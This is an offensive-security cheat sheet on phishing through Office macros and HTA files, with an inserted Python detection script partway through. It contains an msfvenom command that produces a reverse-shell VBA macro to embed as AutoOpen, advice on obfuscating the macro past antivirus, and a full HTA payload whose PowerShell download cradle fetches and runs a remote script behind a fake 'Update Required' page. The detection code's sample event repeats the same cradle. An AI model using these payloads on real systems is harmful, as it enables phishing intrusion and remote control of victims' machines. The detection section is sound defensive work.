# Office Macros & HTA

When you can't break the server, break the user.

## 1. Microsoft Office Macros (VBA)

The classic Word/Excel phishing.

### Payload Creation

1. Generate VBA code with `msfvenom`:

   ```bash
   msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=443 -f vba
   ```
2. Embed it in Word:
   * View -> Macros -> View Macros.
   * Name: `AutoOpen`.
   * Paste the code.

### Basic Obfuscation

Any AV detects unmodified macros.

* Rename variables (`Str` -> `MyString`).
* Split long strings: `a = "power" + "shell.exe"`.

## 2. HTML Application (HTA)

`.hta` files that run as trusted applications (mshta.exe) outside the browser sandbox.

### HTA Payload

```html
<html>
<head>
<script language="VBScript">
    Sub AutoOpen
        Set shell = CreateObject("WScript.Shell")
        shell.Run "powershell -c iex(new-object net.webclient).downloadstring('http://<IP>/run.ps1')", 0
    End Sub
    AutoOpen
</script>
</head>
<body>
    <h1>Update Required</h1>
</body>
</html>
```
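Seen from the detection side, both the macro and the HTA above end with an Office host or mshta.exe launching a script interpreter. The following is an added example, not part of the original page, that flags that parent/child pattern in process-creation events. The field names follow Sysmon Event ID 1 (`Image`, `ParentImage`, `CommandLine`); the sample events, the `192.0.2.10` address and all function names are constructed for illustration.

```python
import ntpath
import re

# Parents used by the page's techniques: Office hosts (VBA macro) and mshta.exe (HTA).
SUSPECT_PARENTS = {"winword.exe", "excel.exe", "mshta.exe"}
# Children that rarely have a legitimate reason to be started by those parents.
SCRIPT_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
# Download-cradle markers, matched case-insensitively because PowerShell ignores case.
CRADLE = re.compile(r"downloadstring|downloadfile|\biex\b|invoke-expression", re.I)

def basename(path):
    """Lower-cased file name of a Windows path, whatever OS this runs on."""
    return ntpath.basename(path).lower()

def score_event(event):
    """Return (severity, reason) for one process-creation event, or None."""
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    if parent not in SUSPECT_PARENTS or child not in SCRIPT_CHILDREN:
        return None
    if CRADLE.search(event.get("CommandLine", "")):
        return ("high", f"{parent} -> {child} with download cradle")
    return ("medium", f"{parent} -> {child}")

def triage(events):
    """Return [(child image, (severity, reason))] for every flagged event."""
    hits = []
    for event in events:
        verdict = score_event(event)
        if verdict:
            hits.append((event["Image"], verdict))
    return hits

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\mshta.exe", "Image": PS,
     "CommandLine": "powershell -c iex(new-object net.webclient)"
                    ".downloadstring('http://192.0.2.10/run.ps1')"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c dir"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe Get-Date"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe", "CommandLine": "splwow64.exe 8192"},
]

if __name__ == "__main__":
    for image, (severity, reason) in triage(SAMPLE_EVENTS):
        print(f"[{severity}] {reason}: {image}")
```

The string-splitting trick from the obfuscation section does not affect this check, because the interpreter still appears as a child process with its final command line.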

## 3. Windows Library Files (.Library-ms)

Technique for executing code via WebDAV when the user browses to a folder.

